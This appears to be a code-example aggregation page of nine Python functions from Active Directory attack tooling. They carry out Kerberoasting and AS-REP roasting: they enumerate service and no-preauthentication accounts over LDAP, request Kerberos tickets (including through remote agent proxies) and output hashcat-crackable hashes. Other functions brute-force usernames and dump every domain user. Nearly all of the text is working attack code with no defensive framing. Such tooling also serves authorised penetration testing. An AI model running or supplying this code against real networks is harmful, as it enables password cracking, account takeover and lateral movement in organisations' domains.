Ejemplo n.º 1
0
	async def kerberoast_multiplexor(self):
		try:
			from multiplexor.operator.external.sspi import KerberosSSPIClient
			from multiplexor.operator import MultiplexorOperator
		except ImportError as error:
			return None, Exception('Failed to import multiplexor module! You will need to install multiplexor to get this working!')

		try:
			ws_logger = logging.getLogger('websockets')
			ws_logger.setLevel(100)
			url_e = urlparse(self.kerb_url)
			agentid = url_e.path.replace('/','')
			operator = MultiplexorOperator(self.kerb_url)
			await operator.connect()
			#creating virtual sspi server
			for uid in self.targets_spn:
				try:
					server_info = await operator.start_sspi(agentid)
					#print(server_info)
					sspi_url = 'ws://%s:%s' % (server_info['listen_ip'], server_info['listen_port'])
					#print(sspi_url)
					ksspi = KerberosSSPIClient(sspi_url)
					await ksspi.connect()

					apreq, err = await ksspi.authenticate(self.targets_spn[uid].get_formatted_pname())
					if err is not None:
						logger.debug('[SPN-MP] error occurred while roasting %s: %s' % (self.targets_spn[uid].get_formatted_pname(), err))
						continue
					unwrap = KRB5_MECH_INDEP_TOKEN.from_bytes(apreq)
					aprep = AP_REQ.load(unwrap.data[2:]).native
					
					t = KerberoastTable.from_hash(self.ad_id, uid, TGSTicket2hashcat(aprep))
					self.session.add(t)

					self.total_targets_finished += 1
					if self.progress_queue is not None:
						msg = GathererProgress()
						msg.type = GathererProgressType.KERBEROAST
						msg.msg_type = MSGTYPE.PROGRESS 
						msg.adid = self.ad_id
						msg.domain_name = self.domain_name
						msg.total = self.total_targets
						msg.total_finished = self.total_targets_finished
						msg.step_size = 1
						await self.progress_queue.put(msg)

				except Exception as e:
					logger.debug('[SPN-MP] Error while roasting %s. %s' % (uid, e))
				finally:
					try:
						await ksspi.disconnect()
					except:
						pass

			self.session.commit()
		except Exception as e:
			return None, e
Ejemplo n.º 2
0
async def spnmultiplexor(args):
	try:
		from multiplexor.operator.external.sspi import KerberosSSPIClient
		from multiplexor.operator import MultiplexorOperator
	except ImportError as error:
		print('Failed to import multiplexor module! You will need to install multiplexor to get this working!')

	logger = logging.getLogger('websockets')
	logger.setLevel(100)
	if args.verbose > 2:
		logger.setLevel(logging.INFO)

	try:
		logging.debug('[SPN-MP] input URL: %s' % args.mp_url)
		url_e = urlparse(args.mp_url)
		agentid = url_e.path.replace('/','')
		logging.debug('[SPN-MP] agentid: %s' % agentid)

		targets = get_targets_from_file(args)
		targets += get_target_from_args(args)
		if len(targets) == 0:
			raise Exception('No targets were specified! Either use target file or specify target via cmdline')
		
		logging.debug('[SPN-MP] loaded %s targets' % len(targets))
		operator = MultiplexorOperator(args.mp_url)
		await operator.connect()
		#creating virtual sspi server
		results = []
		for target in targets:
			server_info = await operator.start_sspi(agentid)
			#print(server_info)
			sspi_url = 'ws://%s:%s' % (server_info['listen_ip'], server_info['listen_port'])
			#print(sspi_url)
			ksspi = KerberosSSPIClient(sspi_url)
			await ksspi.connect()

			apreq, err = await ksspi.authenticate(target.get_formatted_pname())
			if err is not None:
				logging.debug('[SPN-MP] error occurred while roasting %s: %s' % (target.get_formatted_pname(), err))
				continue
			unwrap = KRB5_MECH_INDEP_TOKEN.from_bytes(apreq)
			aprep = AP_REQ.load(unwrap.data[2:]).native
			results.append(TGSTicket2hashcat(aprep))

		if args.out_file:
			with open(args.out_file, 'w', newline = '') as f:
				for thash in results:
					f.write(thash + '\r\n')

		else:
			for thash in results:
				print(thash)

	except Exception as e:
		logging.exception('[SPN-MP] exception!')
Ejemplo n.º 3
0
    async def kerberoast_sspiproxy(self):
        try:
            from wsnet.operator.sspiproxy import WSNETSSPIProxy

            url = self.kerb_url
            agentid = None
            o = urlparse(self.kerb_url)
            if o.query:
                q = parse_qs(o.query)
                agentid = q.get('agentid', [None])[0]
                if agentid is not None:
                    agentid = bytes.fromhex(agentid)

            for uid in self.targets_spn:
                if self.targets_spn[uid].get_formatted_pname().lower(
                ).startswith('krbtgt'):
                    continue
                sspi = WSNETSSPIProxy(url, agentid)
                status, ctxattr, apreq, err = await sspi.authenticate(
                    'KERBEROS',
                    '',
                    self.targets_spn[uid].get_formatted_pname(),
                    3,
                    2048,
                    authdata=b'')
                if err is not None:
                    print(err.__traceback__)
                    print('Failed to get ticket for %s Reason: %s' %
                          (self.targets_spn[uid].get_formatted_pname(),
                           str(err)))
                    continue

                unwrap = KRB5_MECH_INDEP_TOKEN.from_bytes(apreq)
                aprep = AP_REQ.load(unwrap.data[2:]).native
                t = KerberoastTable.from_hash(self.ad_id, uid,
                                              TGSTicket2hashcat(aprep))
                self.db_session.add(t)

                self.total_targets_finished += 1
                if self.progress_queue is not None:
                    msg = GathererProgress()
                    msg.type = GathererProgressType.KERBEROAST
                    msg.msg_type = MSGTYPE.PROGRESS
                    msg.adid = self.ad_id
                    msg.domain_name = self.domain_name
                    msg.total = self.total_targets
                    msg.total_finished = self.total_targets_finished
                    msg.step_size = 1
                    await self.progress_queue.put(msg)

            self.db_session.commit()
        except Exception as e:
            return None, e
Ejemplo n.º 4
0
    async def kerberoast_sspi(self):
        try:
            from winsspi.sspi import KerberoastSSPI

            for uid in self.targets_spn:
                try:
                    spn_name = '%s@%s' % (self.targets_spn[uid].username,
                                          self.targets_spn[uid].domain)
                    if spn_name[:6] == 'krbtgt':
                        continue
                    ksspi = KerberoastSSPI()
                    try:
                        ticket = ksspi.get_ticket_for_spn(spn_name)
                    except Exception as e:
                        logger.debug('Error getting ticket for %s' % spn_name)
                        continue

                    t = KerberoastTable.from_hash(self.ad_id, uid,
                                                  TGSTicket2hashcat(ticket))
                    self.db_session.add(t)

                    self.total_targets_finished += 1
                    if self.progress_queue is not None:
                        msg = GathererProgress()
                        msg.type = GathererProgressType.KERBEROAST
                        msg.msg_type = MSGTYPE.PROGRESS
                        msg.adid = self.ad_id
                        msg.domain_name = self.domain_name
                        msg.total = self.total_targets
                        msg.total_finished = self.total_targets_finished
                        msg.step_size = 1
                        await self.progress_queue.put(msg)

                except Exception as e:
                    logger.debug('Could not fetch tgs for %s' % uid)
            self.db_session.commit()

            return True, None
        except Exception as e:
            return None, e
Ejemplo n.º 5
0
    async def run(self, spns, override_etype=[2, 3, 16, 23, 17, 18]):
        try:
            kcomm = AIOKerberosClient(self.cred, self.target)
            await kcomm.get_TGT(override_etype=override_etype,
                                decrypt_tgt=False)
        except Exception as e:
            logger.exception('a')
            logger.debug('Error logging in! Reason: %s' % (str(e)))

        results = []
        for spn in spns:
            try:
                tgs, _, _ = await kcomm.get_TGS(spn,
                                                override_etype=override_etype)
                results.append(TGSTicket2hashcat(tgs))
            except Exception as e:
                logger.exception('b')
                logger.debug(
                    'Failed to get TGS ticket for user %s/%s/%s! Reason: %s' %
                    (spn.domain, str(spn.service), spn.username, str(e)))
                continue

        return results
Ejemplo n.º 6
0
async def live_roast(outfile=None):
    try:
        logon = get_logon_info()
        domain = logon['domain']
        url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        errors = []
        results = []
        final_results = []
        spn_cnt = 0
        asrep_cnt = 0
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            results = []
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[23])
            results.append(res)

        if outfile is not None:
            filename = outfile + 'asreproast_%s_%s.txt' % (
                logon['domain'],
                datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
            with open(filename, 'w', newline='') as f:
                for thash in results:
                    asrep_cnt += 1
                    f.write(thash + '\r\n')
        else:
            final_results += results

        results = []
        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            try:
                ctx = AcquireCredentialsHandle(None, 'kerberos', spn_name,
                                               SECPKG_CRED.OUTBOUND)
                res, ctx, data, outputflags, expiry = InitializeSecurityContext(
                    ctx,
                    spn_name,
                    token=None,
                    ctx=ctx,
                    flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION)
                if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
                    ticket = InitialContextToken.load(
                        data[0][1]).native['innerContextToken']
                else:
                    raise Exception('Error %s' % res.value)
            except Exception as e:
                print(e)
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if outfile is not None:
            filename = outfile + 'spnroast_%s_%s.txt' % (
                logon['domain'],
                datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
            with open(filename, 'w', newline='') as f:
                for thash in results:
                    spn_cnt += 1
                    f.write(thash + '\r\n')

        else:
            final_results += results

        return final_results, errors, None

    except Exception as e:
        return None, None, e
Ejemplo n.º 7
0
async def amain(args):
    if args.command == 'tgs':
        logging.debug('[TGS] started')
        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()
        spn = KerberosSPN.from_user_email(args.spn)

        logging.debug('[TGS] target user: %s' % spn.get_formatted_pname())
        logging.debug('[TGS] fetching TGT')
        kcomm = AIOKerberosClient(cred, target)
        await kcomm.get_TGT()
        logging.debug('[TGS] fetching TGS')
        await kcomm.get_TGS(spn)

        kcomm.ccache.to_file(args.out_file)
        logging.debug('[TGS] done!')

    elif args.command == 'tgt':
        logging.debug('[TGT] started')
        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()

        logging.debug('[TGT] cred: %s' % cred)
        logging.debug('[TGT] target: %s' % target)

        kcomm = AIOKerberosClient(cred, target)
        logging.debug('[TGT] fetching TGT')
        await kcomm.get_TGT()

        kcomm.ccache.to_file(args.out_file)
        logging.debug('[TGT] Done! TGT stored in CCACHE file')

    elif args.command == 'asreproast':
        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')
        creds = []
        targets = get_targets_from_file(args, False)
        targets += get_target_from_args(args, False)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        logging.debug('[ASREPRoast] loaded %d targets' % len(targets))
        logging.debug(
            '[ASREPRoast] will suppoort the following encryption type: %s' %
            (str(args.etype)))

        ks = KerberosTarget(args.address)
        ar = APREPRoast(ks)
        hashes = []
        for target in targets:
            h = await ar.run(target, override_etype=[args.etype])
            hashes.append(h)

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in hashes:
                    f.write(thash + '\r\n')

        else:
            for thash in hashes:
                print(thash)

        logging.info('ASREPRoast complete')

    elif args.command == 'spnroast':
        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        targets = get_targets_from_file(args)
        targets += get_target_from_args(args)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        logging.debug('Kerberoast loaded %d targets' % len(targets))

        if args.etype:
            if args.etype == -1:
                etypes = [23, 17, 18]
            else:
                etypes = [args.etype]
        else:
            etypes = [23, 17, 18]

        logging.debug(
            'Kerberoast will suppoort the following encryption type(s): %s' %
            (','.join(str(x) for x in etypes)))

        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()
        ar = Kerberoast(target, cred)
        hashes = await ar.run(targets, override_etype=etypes)

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in hashes:
                    f.write(thash + '\r\n')

        else:
            for thash in hashes:
                print(thash)

        logging.info('Kerberoast complete')

    elif args.command == 'brute':
        target = KerberosTarget(args.address)

        with open(args.targets, 'r') as f:
            for line in f:
                line = line.strip()
                spn = KerberosSPN()
                spn.username = line
                spn.domain = args.realm

                ke = KerberosUserEnum(target, spn)

                result = await ke.run()
                if result is True:
                    if args.out_file:
                        with open(args.out_file, 'a') as f:
                            f.write(result + '\r\n')
                    else:
                        print('[+] Enumerated user: %s' % str(spn))

        logging.info('Kerberos user enumeration complete')

    elif args.command == 'spnroast-sspi':
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        targets = get_targets_from_file(args)
        targets += get_target_from_args(args)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        results = []
        errors = []
        for spn_name in targets:
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(
                    spn_name.get_formatted_pname())
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in results:
                    f.write(thash + '\r\n')

        else:
            for thash in results:
                print(thash)

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

        logging.info('SSPI based Kerberoast complete')

    elif args.command == 'spnroast-multiplexor':
        #hiding the import so it's not necessary to install multiplexor
        await spnmultiplexor(args)

    elif args.command == 'auto':
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        domain = args.dc_ip
        url = 'ldap+sspi-ntlm://%s' % domain
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        results = []
        errors = []
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[args.etype])
            results.append(res)

        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(spn_name)
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in results:
                    f.write(thash + '\r\n')
        else:
            for thash in results:
                print(thash)

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

    elif args.command == 'ldap':
        ldap_url = MSLDAPURLDecoder(args.ldap_url)
        client = ldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')

        if args.out_file:
            basefolder = ntpath.dirname(args.out_file)
            basefile = ntpath.basename(args.out_file)

        if args.type in ['spn', 'all']:
            logging.debug('Enumerating SPN user accounts...')
            cnt = 0
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_spn_users.txt'),
                          'w',
                          newline='') as f:
                    async for user in client.get_all_service_users():
                        cnt += 1
                        f.write('%s@%s\r\n' % (user.sAMAccountName, domain))

            else:
                print('[+] SPN users')
                async for user, err in client.get_all_service_users():
                    if err is not None:
                        raise err
                    cnt += 1
                    print('%s@%s' % (user.sAMAccountName, domain))

            logging.debug('Enumerated %d SPN user accounts' % cnt)

        if args.type in ['asrep', 'all']:
            logging.debug('Enumerating ASREP user accounts...')
            ctr = 0
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_asrep_users.txt'),
                          'w',
                          newline='') as f:
                    async for user, err in client.get_all_knoreq_users():
                        if err is not None:
                            raise err
                        ctr += 1
                        f.write('%s@%s\r\n' % (user.sAMAccountName, domain))
            else:
                print('[+] ASREP users')
                async for user, err in client.get_all_knoreq_users():
                    if err is not None:
                        raise err
                    ctr += 1
                    print('%s@%s' % (user.sAMAccountName, domain))

            logging.debug('Enumerated %d ASREP user accounts' % ctr)

        if args.type in ['full', 'all']:
            logging.debug(
                'Enumerating ALL user accounts, this will take some time depending on the size of the domain'
            )
            ctr = 0
            attrs = args.attrs if args.attrs is not None else MSADUser_TSV_ATTRS
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_ldap_users.tsv'),
                          'w',
                          newline='',
                          encoding='utf8') as f:
                    writer = csv.writer(f, delimiter='\t')
                    writer.writerow(attrs)
                    async for user, err in client.get_all_users():
                        if err is not None:
                            raise err
                        ctr += 1
                        writer.writerow(user.get_row(attrs))

            else:
                logging.debug('Are you sure about this?')
                print('[+] Full user dump')
                print('\t'.join(attrs))
                async for user, err in client.get_all_users():
                    if err is not None:
                        raise err
                    ctr += 1
                    print('\t'.join([str(x) for x in user.get_row(attrs)]))

            logging.debug('Enumerated %d user accounts' % ctr)

        if args.type in ['custom']:
            if not args.filter:
                raise Exception(
                    'Custom LDAP search requires the search filter to be specified!'
                )
            if not args.attrs:
                raise Exception(
                    'Custom LDAP search requires the attributes to be specified!'
                )

            logging.debug(
                'Perforing search on the AD with the following filter: %s' %
                args.filter)
            logging.debug('Search will contain the following attributes: %s' %
                          ','.join(args.attrs))
            ctr = 0

            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_ldap_custom.tsv'),
                          'w',
                          newline='') as f:
                    writer = csv.writer(f, delimiter='\t')
                    writer.writerow(args.attrs)
                    async for obj, err in client.pagedsearch(
                            args.filter, args.attrs):
                        if err is not None:
                            raise err
                        ctr += 1
                        writer.writerow([
                            str(obj['attributes'].get(x, 'N/A'))
                            for x in args.attrs
                        ])

            else:
                async for obj, err in client.pagedsearch(
                        args.filter, args.attrs):
                    if err is not None:
                        raise err
                    ctr += 1
                    print('\t'.join([
                        str(obj['attributes'].get(x, 'N/A'))
                        for x in args.attrs
                    ]))
Ejemplo n.º 8
0
async def run_auto():
    try:
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        from winacl.functions.highlevel import get_logon_info

        logon = get_logon_info()
        domain = logon['domain']
        url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        errors = []
        spn_cnt = 0
        asrep_cnt = 0
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            results = []
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[23])
            results.append(res)

        filename = 'asreproast_%s_%s.txt' % (
            logon['domain'],
            datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
        with open(filename, 'w', newline='') as f:
            for thash in results:
                asrep_cnt += 1
                f.write(thash + '\r\n')

        results = []
        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(spn_name)
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        filename = 'spnroast_%s_%s.txt' % (
            logon['domain'],
            datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
        with open(filename, 'w', newline='') as f:
            for thash in results:
                spn_cnt += 1
                f.write(thash + '\r\n')

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

        print('[+] Done! %s spnroast tickets %s asreproast tickets' %
              (spn_cnt, asrep_cnt))
    except Exception as e:
        print(e)
Ejemplo n.º 9
0
    def run_live(self, args):
        from winsspi.sspi import KerberoastSSPI
        from minikerberos.common.utils import TGSTicket2hashcat, TGTTicket2hashcat
        from minikerberos.security import APREPRoast
        from minikerberos.network.clientsocket import KerberosClientSocket
        from minikerberos.common.target import KerberosTarget
        from pypykatz.commons.winapi.machine import LiveMachine

        if not args.target_file and not args.target_user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        machine = LiveMachine()

        realm = args.realm
        if not args.realm:
            realm = machine.get_domain()

        if args.cmd in ['spnroast', 'asreproast']:
            targets = []
            if args.target_file:
                with open(args.target_file, 'r') as f:
                    for line in f:
                        line = line.strip()
                        domain = None
                        username = None
                        if line.find('/') != -1:
                            #we take for granted that usernames do not have the char / in them!
                            domain, username = line.split('/')
                        else:
                            username = line

                        if args.realm:
                            domain = args.realm
                        else:
                            if domain is None:
                                raise Exception(
                                    'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                                )

                        target = KerberosTarget()
                        target.username = username
                        target.domain = domain
                        targets.append(target)

            if args.target_user:
                for user in args.target_user:
                    domain = None
                    username = None
                    if user.find('/') != -1:
                        #we take for granted that usernames do not have the char / in them!
                        domain, username = user.split('/')
                    else:
                        username = user

                    if args.realm:
                        domain = args.realm
                    else:
                        if domain is None:
                            raise Exception(
                                'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                            )
                    target = KerberosTarget()
                    target.username = username
                    target.domain = domain
                    targets.append(target)

            results = []
            errors = []
            if args.cmd == 'spnroast':
                for spn_name in targets:
                    ksspi = KerberoastSSPI()
                    try:
                        ticket = ksspi.get_ticket_for_spn(
                            spn_name.get_formatted_pname())
                    except Exception as e:
                        errors.append((spn_name, e))
                        continue
                    results.append(TGSTicket2hashcat(ticket))

            elif args.cmd == 'asreproast':
                dcip = args.dc_ip
                if args.dc_ip is None:
                    dcip = machine.get_domain()
                ks = KerberosClientSocket(dcip)
                ar = APREPRoast(ks)
                results = ar.run(targets)

            if args.out_file:
                with open(args.out_file, 'w') as f:
                    for thash in results:
                        f.write(thash + '\r\n')

            else:
                for thash in results:
                    print(thash)

            for err in errors:
                print('Failed to get ticket for %s. Reason: %s' %
                      (err[0], err[1]))

            logging.info('SSPI based Kerberoast complete')